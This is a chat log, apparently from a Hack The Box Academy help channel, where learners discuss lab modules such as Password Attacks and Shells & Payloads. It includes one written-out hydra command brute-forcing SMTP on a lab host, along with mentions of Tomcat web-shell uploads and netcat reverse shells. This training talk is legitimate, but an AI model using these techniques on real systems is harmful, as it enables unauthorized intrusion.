anyone know other virtual machine alternatives for mac m1 besides, fusion player, virtual box, and utm?

distant arrow
fathom pendant
#

And ARM isos that aren't architect

hasty solar
raven cairn
#

It took forever

#

Ignoring a couple few bad sections the module was great tho

hasty solar
#

Login bruteforcing skills assesment is quite similar

#

jaja

#

but if need help in any module I've completed dm me

primal silo
alpine mural
#

Hello, after two days I'm still stuck in finding the last flag of the sqlfundamentals module, can anyone give me a clue where I'm going wrong?

dim temple
primal silo
eager trout
#

k

austere osprey
#

Just arrived at Password Mutations at Password Attacks module and I must say that I'm so disappointed from HTB.
This kind of question that takes so much time to brute force an ssh password teaches you nothing and takes so much timeeee
Instead of teaching people new stuff you are WASTING their time on bullshit, so DISAPPOINTED by you.........

acoustic owl
cinder mortar
#

what does --local-auth mean, i read the man page it says authenticate locally to each target but i dont quite understand what this means

acoustic owl
alpine mural
hazy minnow
#

I'm getting a really weird issue on the Password Attacks Module - Networks Services Questions. for the box, using nmap, I found ||NFS ||to be open. Not sure if this is the way in, but trying ||to mount NFS||, gives the permissions to the mounted folder to user '4294967294' and I'm unable to access it locally. Been at this for a few hours, any idea what this is?? If this isn't the way in let me know and I'll abandon this but I quicky tried accessing other open ports anonymously and get ACCESS DENIED everywhere... EDIT: I went back to the Footprinting Module that covered this method and port and was able to access right away. The version over there was 4.2, the version for this module/question is 3 - would that have anything to do with it?

primal silo
subtle glen
#

shells & payloads, skills assessment, i have no clue what do, i rpd in the host (which is painfuly slow, it runs at 5 fps for some reason) i login in tomcat with creds i found in the ||file system along with some admin creds|| i tried the aspx file, didnt work, i tried changing the content with burp, i can only forward once, it does nothing, there is no output at all, i tried a metasploit module i found, nothing, i tried with antak and php too, nothing.
can i please have some help?

grand harbor
#

anyone that can help me with linux credentials harvesting..

hasty solar
grand harbor
sly tapir
raw yarrow
#

Hello.

rustic sage
#

Hi everyone

#

i need help with getting started module web enumeration part!

#

There's this question asking to find the flag:

#

Can somebody pls tell me what is a flag?

fathom pendant
# rustic sage

A flag is the text contents of a file that is the goal you are achieving, usually in the form of HTB{...} However it may be different depending on the question. Usually the question informs you of the format it's looking for

thick relic
#

Hello, i am new to htb. Do you have any recommandation on what modules should i start first?

fathom pendant
#

Any of the fundamentals

foggy light
#

Attacking Common Services Easy
Found the user F***** using smtp-user-enum
then I tried brute forcing FTP and SMTP using hydra but no valid password

hydra -l "f*****" -P pws.list -f 10.129.3.121 smtp
fathom pendant
#

To create code blocks either put your line in between backticks `like this`

#

Or triple ticks for multiple lines

foggy light
#

yea it just messed up my copy paste code lol

#

but any clue about the issue?

river skiff
crude vessel
#

Hello, in AD skills assessments part I, I am trying to perform a reverse shell with netcat (first question), but when executing netcat (with the full path and the .exe), I get the error that the executable is corrupt, some idea of โ€‹โ€‹how to perform the reverse shell? (tried with msfvenom and got no response)

warm sail